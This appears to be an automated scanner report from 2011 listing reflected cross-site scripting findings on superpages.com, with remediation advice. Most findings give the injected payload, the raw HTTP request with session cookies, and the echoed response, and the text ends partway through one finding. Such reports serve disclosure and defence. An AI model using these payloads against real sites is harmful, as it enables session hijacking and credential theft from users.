Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/
1.2. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:20 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow"> ...[SNIP]...
1.3. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:16 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57268 Date: Thu, 03 Feb 2011 17:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/ Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:29:25 GMT Content-Length: 66686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... ype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:57 GMT Content-Length: 66498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... tp://yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'ht ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/ Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:18 GMT Content-Length: 128435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');"> ...[SNIP]...
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/ Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:33 GMT Content-Length: 126537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ww.superpages.com"; s.prop5 = "Advanced Search, Business Profile"; s.prop9 = "Advanced Search"; s.eVar23 = "Advanced Search"; s.hier1 = "Advanced Search, Business Profile"; var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516"; if(s_campaign){ s.campaign = s_campaign; } var s_code = s.t(); if(s_code) document.writeln(s_code); //--> ...[SNIP]...
The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/ Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:23 GMT Connection: close Content-Length: 23380
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/ Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:03 GMT Content-Length: 66496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... archtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/ Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:28:30 GMT Content-Length: 60956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank - Handlin ...[SNIP]... = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
1.13. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/ Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:48 GMT Content-Length: 23390
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... pe="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
